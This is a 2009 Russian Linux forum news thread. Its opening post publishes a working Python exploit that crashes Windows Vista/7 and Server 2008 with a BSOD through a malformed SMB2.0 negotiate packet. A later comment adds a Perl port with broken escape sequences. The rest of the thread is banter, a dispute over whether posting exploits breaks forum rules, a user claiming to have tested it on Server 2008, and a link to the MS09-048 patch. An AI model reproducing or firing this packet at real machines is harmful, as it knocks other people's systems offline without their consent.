anonymous@RULINUX.NET~# Last login: 2020-03-30 02:09:30
Регистрация Вход Новости | Разметка | Пользователи | Галерея | Форум | Статьи | Неподтвержденное | Трекер | Правила форума | F.A.Q. | Ссылки | Поиск
[#] [Добавить метку] [Редактировать]
Скрыть

Опубликована программка на пятоне, реализующая вендекапец для любой машины под вистой и новее

Как оказалось, виндовая реализация SMB2.0, поставляемая со всеми новыми поделками микросовта начиная с висты, выносит систему в BSOD при получении [не]правильно сформированного запроса на инициализацию сеанса связи (т.е. привилегии на этой стадии не нужны).

Системы, подверженные капцу: Windows Vista/7 All (64b/32b|SP1/SP2 проапдейченные до последних версий) и, возможно, Win Server 2008 поскольку тот использует SMB2.0 (не тестировался).

Код:

python
#!/usr/bin/python
#When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field
#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error

from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: -> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
 

anonymous(*) (2009-09-08 15:10:56)


Подтверждено: Tux-oid(*) (2009-09-09 10:24:37)

[Ответить на это сообщение]

avatar
Скрыть

Re: Опубликована программка на пятоне, реализующая вендекапец для любой машины под вистой и новее

блять.. Как отредактировать своё сообщение?

anonymous(*)(2009-09-08 15:12:52)

avatar
Скрыть

Re: Опубликована программка на пятоне, реализующая вендекапец для любой машины под вистой и новее

новости пока никак. создай новую и для подсветки используй тег begin{highlight} как указано тут http://www.lor-ng.org/page.php?id=2

Tux-oid(*)(2009-09-08 15:15:48)

Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1) Gecko/20090624 Firefox/3.5
avatar
Скрыть

Re: Опубликована программка на пятоне, реализующая вендекапец для любой машины под вистой и новее

Не буду. Не дал пользователям возможность править посты - вот сам и правь. И минимальный хелп можно было бы сунуть на форму ввода, или хотя бы ссылку на него.

me в бешенстве ищет чего бы сломать

anonymous(*)(2009-09-08 15:26:49)

avatar
Скрыть

Re: Опубликована программка на пятоне, реализующая вендекапец для любой машины под вистой и новее

Ха, у меня есть nuke.exe, дайте айпи какого-нибудь ламера!

anonymous(*)(2009-09-08 16:31:20)

Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
avatar
Скрыть

Re: Опубликована программка на пятоне, реализующая вендекапец для любой машины под вистой и новее

127.0.0.1

Tux-oid(*)(2009-09-08 16:33:50)

Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1) Gecko/20090624 Firefox/3.5
avatar
Скрыть

Re: Опубликована программка на пятоне, реализующая вендекапец для любой машины под вистой и новее

бедон на венде нужен?

bugmaker(*)(2009-09-08 16:57:15)

Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.0.13) Gecko/2009080315 Ubuntu/9.04 (jaunty) Firefox/3.0.13
avatar
Скрыть

Re: Опубликована программка на пятоне, реализующая вендекапец для любой машины под вистой и новее

Это твой айпи ;)

anonymous(*)(2009-09-08 17:21:13)

Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
avatar
Скрыть

Re: Опубликована программка на пятоне, реализующая вендекапец для любой машины под вистой и новее

А ты попробуй, узнаешь. Тока пробуй из висты или семерки.

Tux-oid(*)(2009-09-08 17:22:47)

Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1) Gecko/20090624 Firefox/3.5
avatar
Скрыть

Господа, это 3.5

3. Сообщения подлежат немедленному удалению, если: ... 5. Содержат ссылки на вредоносное ПО

anonymous(*)(2009-09-08 17:36:22)

Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.2) Gecko/20090902 Gentoo Firefox/3.5.2
[#] [Добавить метку] [Редактировать] Ответ на: Господа, это 3.5 от anonymous 2009-09-08 17:36:22
avatar
Скрыть

Re: Господа, это 3.5

> ссылки на вредоносное ПО Это полезнетворное ПО, не следует путать :)

Кстати, я же говорил, что правила нахуй не нужны :))

anonymous(*)(2009-09-08 17:57:31)

[#] [Добавить метку] [Редактировать] Ответ на: Господа, это 3.5 от anonymous 2009-09-08 17:36:22
avatar
Скрыть

Re: Господа, это 3.5

>3. Сообщения подлежат немедленному удалению, если: ... 5. Содержат ссылки на вредоносное ПО нет, это статья о дыре в смб, в которой, для пущей наглядности, есть питоновский скрипт.

anonymous(*)(2009-09-08 18:04:08)

Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13
[#] [Добавить метку] [Редактировать] Ответ на: Re: Господа, это 3.5 от anonymous 2009-09-08 18:04:08
avatar
Скрыть

Re: Господа, это 3.5

да и скрипт то не вредоносный, т.к. всего-лишь отсылает смб-запрос, а то ты щас и пинг к вредоносному по приравняешь.

anonymous(*)(2009-09-08 18:25:10)

Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13
[#] [Добавить метку] [Редактировать] Ответ на: Re: Господа, это 3.5 от anonymous 2009-09-08 18:25:10
avatar
Скрыть

Re: Господа, это 3.5

> да и скрипт то не вредоносный, т.к. всего-лишь отсылает смб-запрос, а то ты щас и пинг к вредоносному по приравняешь. Скрипт какраз вредоносный, так как отсылает неправильный смб-запрос.

anonymous(*)(2009-09-08 19:28:59)

Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.2) Gecko/20090902 Gentoo Firefox/3.5.2
[#] [Добавить метку] [Редактировать] Ответ на: Re: Господа, это 3.5 от anonymous 2009-09-08 19:28:59
avatar
Скрыть

Re: Господа, это 3.5

> неправильный смб-запрос А с чего ты взял, что это SMB-запрос? Можно же взять твой пост и отправить кому-нить на порт, на котором обычно висит самба - и что, на этом основании тебя следует признать вредоносным анонимусом?

anonymous(*)(2009-09-08 20:17:50)

[#] [Добавить метку] [Редактировать] Ответ на: Re: Господа, это 3.5 от anonymous 2009-09-08 20:17:50
avatar
Скрыть

Re: Господа, это 3.5

> А с чего ты взял, что это SMB-запрос? Можно же взять твой пост и отправить кому-нить на порт, на котором обычно висит самба - и что, на этом основании тебя следует признать вредоносным анонимусом? Не меня,а того, кто отправил. В случае, если он положил чужую систему умышленно.

anonymous(*)(2009-09-08 20:36:15)

Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.2) Gecko/20090902 Gentoo Firefox/3.5.2
[#] [Добавить метку] [Редактировать] Ответ на: Re: Господа, это 3.5 от anonymous 2009-09-08 19:28:59
avatar
Скрыть

Re: Господа, это 3.5

нет, полезный. Он отсылает правильный запрос, который совершает нужное дело - вендекапец!

bugmaker(*)(2009-09-08 20:45:09)

Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.0.13) Gecko/2009080315 Ubuntu/9.04 (jaunty) Firefox/3.0.13
[#] [Добавить метку] [Редактировать] Ответ на: Re: Господа, это 3.5 от anonymous 2009-09-08 20:36:15
avatar
Скрыть

Re: Господа, это 3.5

> Не меня,а того, кто отправил Вот видишь, а у тебя какие-то претензии к коду.. Ножики знаешь ли тоже в магазине продают. Хотя казалось бы предмет зловредный: ведь им можно покалечить какого-нибудь вендузятника.. Но ведь продают же..

anonymous(*)(2009-09-08 21:17:58)

[#] [Добавить метку] [Редактировать] Ответ на: Re: Господа, это 3.5 от anonymous 2009-09-08 21:17:58
avatar
Скрыть

Re: Господа, это 3.5

> Ножики знаешь ли тоже в магазине продают Ножик нужен чтобы колбаску резать итп. А вот этот скрипт создан только для порчи нервов вендузятникам.

anonymous(*)(2009-09-08 22:25:46)

Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.2) Gecko/20090902 Gentoo Firefox/3.5.2
[#] [Добавить метку] [Редактировать] Ответ на: Re: Господа, это 3.5 от anonymous 2009-09-08 22:25:46
avatar
Скрыть

Re: Господа, это 3.5

>>порчи нервов вендузятникам так и надо, этим ежикам - пускай ищут альтернативу винде.

anonymous(*)(2009-09-08 23:44:49)

Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1) Gecko/20090705 Firefox/3.5
[#] [Добавить метку] [Редактировать] Ответ на: Re: Господа, это 3.5 от anonymous 2009-09-08 22:25:46
avatar
Скрыть

Re: Господа, это 3.5

>Ножик нужен чтобы колбаску резать итп. А вот этот скрипт создан только для порчи нервов вендузятникам. а с чего ты взял что он создан именно для порчи, а не, скажем, для наглядности?

anonymous(*)(2009-09-09 01:13:29)

Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11
avatar
Скрыть

Re: Опубликована программка на пятоне, реализующая вендекапец для любой машины под вистой и новее

педалезно

vilfred(*)(2009-09-09 11:54:29)

Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
avatar
Скрыть

Re: Опубликована программка на пятоне, реализующая вендекапец для любой машины под вистой и новее

>Win Server 2008 поскольку тот использует SMB2.0 (не тестировался).
Я протестировал - работает)))

anonymous(*)(2009-09-09 15:20:40)

Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
avatar
Скрыть

Re: Опубликована программка на пятоне, реализующая вендекапец для любой машины под вистой и новее

> Я протестировал - работает)))
Напиши авторам эксплойта благодарственное письмо.

anonymous(*)(2009-09-09 15:29:38)

avatar
Скрыть

Re: Опубликована программка на пятоне, реализующая вендекапец для любой машины под вистой и новее

Это конечно здорово. Но при чём здесь Linux?

anonymous(*)(2009-09-09 16:31:04)

Opera/9.80 (X11; Linux i686; U; ru) Presto/2.2.15 Version/10.00
avatar
Скрыть

Re: Опубликована программка на пятоне, реализующая вендекапец для любой машины под вистой и новее

и почему не на Ъ-перле?

anonymous(*)(2009-09-09 16:33:49)

Opera/9.80 (X11; Linux i686; U; ru) Presto/2.2.15 Version/10.00
avatar
Скрыть

Re: Опубликована программка на пятоне, реализующая вендекапец для любой машины под вистой и новее

> и почему не на Ъ-перле?
Воще должна быть на ✞-джаве. Для кроссплатформенности. Что бы пользователи любых операционных систем имели возможность самостоятельно убедиться в ненадёжности виндовса.

anonymous(*)(2009-09-09 16:47:40)

avatar
Скрыть

Re: Опубликована программка на пятоне, реализующая вендекапец для любой машины под вистой и новее

> на ✞-джаве. Для кроссплатформенности
Дык для виндоза вродь питон же есть.

anonymous(*)(2009-09-09 17:30:13)

Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.2) Gecko/20090902 Gentoo Firefox/3.5.2
avatar
Скрыть

Re: Опубликована программка на пятоне, реализующая вендекапец для любой машины под вистой и новее

Ну так он и под джаву есть, только кто его ставит. Разве что какие-нибудь маргиналы

anonymous(*)(2009-09-09 17:47:04)

avatar
Скрыть

Re: Опубликована программка на пятоне, реализующая вендекапец для любой машины под вистой и новее

>>Но при чём здесь Linux?
Как это при чём? -> #!/usr/bin/python

anonymous(*)(2009-09-10 00:17:21)

Mozilla/5.0 (X11; U; Linux i686; ru-RU; rv:1.8.1.4) Gecko/20070601 SeaMonkey/1.1.2
avatar
Скрыть

Re: Опубликована программка на пятоне, реализующая вендекапец для любой машины под вистой и новее

а что за фирма такая - "микросовт"?

anonymous(*)(2009-09-10 02:22:58)

Opera/9.80 (X11; Linux i686; U; ru) Presto/2.2.15 Version/10.00
avatar
Скрыть

Re: Опубликована программка на пятоне, реализующая вендекапец для любой машины под вистой и новее

уже есть патчик  http://www.microsoft.com/technet/security/Bulletin/MS09-048.mspx

anonymous(*)(2009-09-10 15:18:47)

Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)
avatar
Скрыть

Re: Опубликована программка на пятоне, реализующая вендекапец для любой машины под вистой и новее

но для икспи и в2к не работает  http://lor-ng.org/message.php?newsid=4350

vilfred(*)(2009-09-16 17:17:31)

Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
avatar
Скрыть

Re: Опубликована программка на пятоне, реализующая вендекапец для любой машины под вистой и новее

Щитаю эксплойты в новостях дурным тоном. Новость о дыре - гуд. А эксплойт пусть детки сами ищут. Ну можно на форум выгрузить, раз зудит и чешется. Но не на глагну же.

anonymous(*)(2009-09-18 12:35:20)

Mozilla/5.0 (X11; U; Linux x86_64; ru-RU; rv:1.9.1.3) Gecko/20090914 Gentoo Firefox/3.5.3
avatar
Скрыть

Re: Опубликована программка на пятоне, реализующая вендекапец для любой машины под вистой и новее

perl
#!/usr/bin/perl

use IO::Socket;
use warnings;
use strict;

my $buff="".
"x00x00x00x90".
"xffx53x4dx42".
"x72x00x00x00".
"x00x18x53xc8".
"x00x26".# Process ID High: --> normal value should be "x00x00"
"x00x00x00x00x00x00x00x00x00x00xffxffxffxfe".
"x00x00x00x00x00x6dx00x02x50x43x20x4ex45x54".
"x57x4fx52x4bx20x50x52x4fx47x52x41x4dx20x31".
"x2ex30x00x02x4cx41x4ex4dx41x4ex31x2ex30x00".
"x02x57x69x6ex64x6fx77x73x20x66x6fx72x20x57".
"x6fx72x6bx67x72x6fx75x70x73x20x33x2ex31x61".
"x00x02x4cx4dx31x2ex32x58x30x30x32x00x02x4c".
"x41x4ex4dx41x4ex32x2ex31x00x02x4ex54x20x4c".
"x4dx20x30x2ex31x32x00x02x53x4dx42x20x32x2e".
"x30x30x32x00";

$socket = IO::Socket::INET->new(PeerAddr => "127.0.0.1", # Измени это, ССЗБ
                                PeerPort => "445",
                                Proto    => "tcp",
                                Type     => SOCK_STREAM)
          or die "Could not connect to remote host: $@ ";

print $socket $buff;

print "Now check if that machine works :D ";
 

anonymous(*)(2009-09-21 16:15:07)

Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14
avatar
Скрыть

Re: Опубликована программка на пятоне, реализующая вендекапец для любой машины под вистой и новее

 http://paste.org.ru/?w7g6a9 Вот короче.

anonymous(*)(2009-09-21 16:16:53)

Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14
avatar
Скрыть

Re: Опубликована программка на пятоне, реализующая вендекапец для любой машины под вистой и новее

s/$socket\ =/my\ $socket\ =/

anonymous(*)(2009-09-21 18:34:20)

Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14
Этот тред читают 1 пользователь:
Анонимных: 1
Зарегистрированных: 0




(c) 2010-2020 LOR-NG Developers Group
Powered by TimeMachine

Valid HTML 4.01 Transitional Правильный CSS!